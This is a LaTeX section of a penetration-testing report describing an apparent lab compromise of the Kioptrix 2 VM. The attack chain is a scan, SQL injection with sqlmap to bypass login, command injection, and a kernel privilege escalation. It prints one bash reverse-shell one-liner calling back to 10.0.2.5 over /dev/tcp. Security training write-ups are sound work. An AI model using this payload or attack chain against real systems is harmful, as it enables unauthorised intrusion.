\documentclass[Ses-Report-Pentesting.tex]{llncs}

\section{Kioptrix 2: Attack Narrative}
\begin{document}
\subsection{Information Gathering}
\label{ssec:k2-more-info}
Using the tools nmap and nikto, I analyzed the web services that are running, which do not seem to be vulnerable.

\begin{figure}[H]
  \vspace{-2ex}
  \begin{center}
    \includegraphics[width=\linewidth]{img/k2_nmap_scan.png}
    \vspace{-4ex}
    \label{fig:k2-nmap-scan}
  \end{center}
  \vspace{-4ex}
\end{figure}

\subsection{Apache, SQL Injection and Command Injection}
I visited the web site provided by the server and the main page presents a login form.
I tampered the data and used \texttt{sqlmap} to check for SQLInjection vulnerabilities, which I did find.
\begin{figure}[H]
  \vspace{-2ex}
  \begin{center}
    \includegraphics[width=\linewidth]{img/k2_tamper_data.png}
    \vspace{-4ex}
    \label{fig:k2-tamper-data}
  \end{center}
  \vspace{-4ex}
\end{figure}

I thus used the \texttt{sqlmap} to extract some information. 
However, I could not open a reverse shell in this way.

\begin{figure}[H]
  \vspace{-2ex}
  \begin{center}
    \includegraphics[width=\linewidth]{img/k2_sqlmap_scan.png}
    \vspace{-4ex}
    \label{fig:k2-sqlmap-scan}
  \end{center}
  \vspace{-4ex}
\end{figure}

I leveraged on the discovered SQLInjection vulnerability to bypass the login and I proceeded to a new page where I am required to input an address in order to check if it is online.
I found that this form does not properly sanitize the inputs and I was able to perform Command Injection.
I leveraged on this vulnerability to open a reverse shell, injecting the following bash command and catching the produced request using the tool \texttt{nc}:
\begin{lstlisting}[style=hsab]
  0<&196;exec 196<>/dev/tcp/10.0.2.5/10009; sh <&196 >&196 2>&196
\end{lstlisting}
In this way I was able to open a reverse shell as user \textit{apache} and to get other information about the system, such as the Linux Kernel version currently  running.
I looked for some known privilege escalation exploits for the running Linux Kernel, and I found one working.

\begin{figure}[H]
  \vspace{-2ex}
  \begin{center}
    \includegraphics[width=\linewidth]{img/k2_root_shell.png}
    \vspace{-4ex}
    \label{fig:k2-root-shell}
  \end{center}
  \vspace{-4ex}
\end{figure}

\end{document}
